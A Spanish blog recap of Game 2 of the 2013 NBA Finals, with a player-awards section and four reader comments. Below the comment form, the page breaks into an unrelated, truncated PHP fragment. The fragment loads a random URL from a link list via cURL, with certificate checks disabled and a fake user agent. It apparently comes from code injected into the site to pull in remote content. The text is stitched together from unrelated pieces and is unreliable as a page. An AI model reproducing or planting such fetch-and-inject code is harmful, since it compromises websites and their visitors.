La Crónica: Cuestión de urgencias

10 de June de 2013 por MagicJohnson32

lebron splitter block

La urgencia es un arma de doble filo, y no son pocos los equipos que han acabado acuchillados por ella. Para los Heat, la urgencia por empatar la serie antes de viajar a Texas resultó el combustible que les condujo a la victoria (84-103). Los Spurs, demasiado conformistas después de llevarse el primer partido de estas Finales, no alcanzaron la intensidad de su rival y cometieron la clase de errores que te condenan ante los Heat.

No asistimos a un extraordinario despliegue de Miami, sino a un esfuerzo sólido y constante como equipo, mucho menos dependiente de LeBron. De esta manera, a los triples de Danny Green los Heat replicaron con una buena defensa en la pintura y muchas aportaciones en ataque. Chris Bosh se dejó de triples y volvió a demostrar que es de los mejores desde media distancia, Wade atacó el aro y repartió juego, Chalmers jugó en modo Super Mario y desde el banco aparecieron Chris Andersen, Ray Allen y Mike Miller para anotar casi todo lo que lanzaron. Enfrente, a Tim Duncan se le vio por una vez como el jugador de 37 años que es, Tony Parker entregó la posesión tantas veces como asistió (5) y Manu Ginóbili realizó uno de los peores encuentros que le recordamos en citas de esta trascendencia.

Y, pese a todo, hubo partido hasta los últimos minutos del tercer cuarto. Los puntos de Danny Green, que logró el récord de triples sin fallo en unas Finales con su 5 de 5, y la labor de Kawhi Leonard, sostuvieron a los Spurs hasta que Miami soltó el hachazo definitivo, justo cuando parecía que podía repetirse la película del primer partido (58-56). LeBron James estaba firmando un partido muy gris, con apenas un par de destellos -como el tapón a Duncan del primer cuarto- que no escondían un rendimiento claramente por debajo de lo esperado. Así que Spoelstra recurrió a un planteamiento que suele ofrecer buenos réditos a su equipo: utilizar a LeBron como bloqueador en situaciones de pick & roll. Chalmers, más que nadie, aprovechó los desajustes que esto provocó en la defensa de los Spurs. 9 puntos del base, dos triples de Mike Miller, otro de Ray Allen, un par de canastas de James… El parcial favorable a los Heat crecía y el tanteo ya era de +19 para el equipo local cuando LeBron protagonizó uno de los mejores tapones de la historia de las Finales, quién sabe si el mejor que hayamos visto jamás.

Los Spurs, hundidos en un 2-25 en contra, tiraron la toalla, sabedores de que tienen la eliminatoria donde querían, con un 1-1 antes de trasladarse a San Antonio para la disputa de los tres siguientes partidos. Veremos cómo responden los de Popovich ante la urgencia de ganar el 3º, en la madrugada del martes al miércoles.

chalmers green

PREMIOS

MVP: LeBron James estuvo negado de cara a canasta buena parte del encuentro pero lideró junto a Chalmers la embestida definitiva de su equipo. Acabó el partido con 17 puntos, 8 rebotes, 7 asistencias, 3 robos y 3 tapones.

Sorpresa: Durante muchos minutos, Mario Chalmers fue el mejor de su equipo. Con los Spurs 1 arriba a falta de 3 minutos para acabar el tercer cuarto, él inició y acabó el parcial que llevó a los Heat a los 10 puntos de ventaja al final del período. Acabó el partido con 19 puntos.

Decepción: Tras el gran partido de hace unos días tocó la de arena para Tony Parker, Tim Duncan y Manu Ginóbili. Entre los 3 anotaron 27 puntos con un 10 de 33 en tiros de campo.

Esfuerzo en vano: Ante el mal día de Parker, Duncan y Ginóbili fueron Danny Green (17 puntos, 5 de 5 en triples) y Kawhi Leonard (9 puntos, 14 rebotes, 8 de ellos ofensivos) los que dieron la cara.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Paliza de los Heat.
    Cuando todo parecía encaminado a un final de nuevo apretado con los Spurs poniéndose por delante mediado el tercer cuarto de repente Miami se cascó un parcial de 33-5 que finiquitó el partido de un plumazo.
    Hasta ese momento el partido había transcurrido igualadísimo con las estrellas de ambos equipos bastante apagadas y siendo los secundarios los que tiraban del carro. En Miami con un LeBron desconocido a la hora de sumar puntos eran Chalmer (muy agresivo contra Parker) y Allen, Miller, Andersen, Bosh o Wade los que iban sumando para los de Florida mientras en San Antonio con un Parker poco acertado al igual que Duncan y con Ginobilli fuera del partido eran los triples de Green y Neal y el incansable trabajo de Leonard los que mantenían cerca o por delante a San Antonio.
    Y de repente el super parcial. Con todo encaminado para otro final igualado, de repente los Heat empezaron a encontrar tiros abiertos y transiciones para matar el partido de mano de Mike Miller, Ray Allen y Mario Chalmers. Parece mentira pero fueron los secundarios de Miami los que levantaron el partido. En el otro lado los Spurs parecieron tirar demasiado pronto el partido y se vinieron abajo como pensando ya en volver a casa con el 1-1.
    Ahora las Finales están empatadas y llega el tramo decisivo en San Antonio. Estos dos próximos partidos han de marcar qué Finales veremos y si los Heat realmente van a volver a dominar o si son los Spurs los que se imponen en El Alamo o bien todo queda para los últimos partidos. No me atrevería ahora mismo a hacer pronósticos. De lo más interesante se pone esto…

      Citar

  2. L.Casei dice:
    #2

    Lo de LeBron simplemente es brutal… yo no había visto en mi vida un tapón similar a este, y no suelo exagerar ni es que haya visto pocos partidos de Baloncesto.
    Es posible que Jordan no habrá más que uno en la historia, pero lo de este jugador es tremendo… la mezcla de ambición, capacidad atlética simplemente irrepetible, versatilidad, conocimento del juego, visión, defensa… En fin, lo dicho, Jordan no hay más que uno…
    Habéis visto la portada y el reportaje de Sports Illustrated? Impresionante análisis… Y es verdad que es muy posible que no exista ningún otro jugador capaz de defender (y atacar) a cualquier rival, mida 1.80 ó 2.10… simplemente lo hace.

    P.D. Los Spurs creo van a ganar el 3° en San Antonio… eso le voy a decir a la chica de mi casa de apuestas… tras un palo como el 33-5 de parcial desde el 3° cuarto… Pops no lo querrá repetir. Apostaría incluso que va a ganar ampliamente SAS… Veremos.

      Citar

  3. Denise dice:
    #3

    El tapón de Lebron al Splitter es el mejor que he visto en mi vida. No recuerdo uno que me haya impactado tanto, y además en el momento en que se produce.
    Lo de Splitter es increible, quien lo ha visto y quien lo ve…, vaya porquería de center, en vez de sangre tiene caepirinha en las venas.

      Citar

  4. maravich dice:
    #4

    Bueno no hay que cebarse con Splitter… le tocó a él como le podía haber pasado a otro con ese bicharraco enfrente.
    Creo que es un buen center, de nivel medio/alto en la NBA… Popovich no regala minutos a nadie… para muestra, mira DeJuan Blair… o te lo ganas o nada… El brasileño ha hecho una buena campaña, por ahora su mejor temporada… lo extraño es lo que le pasa con los tiros libres… está como bloqueado desde la línea…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>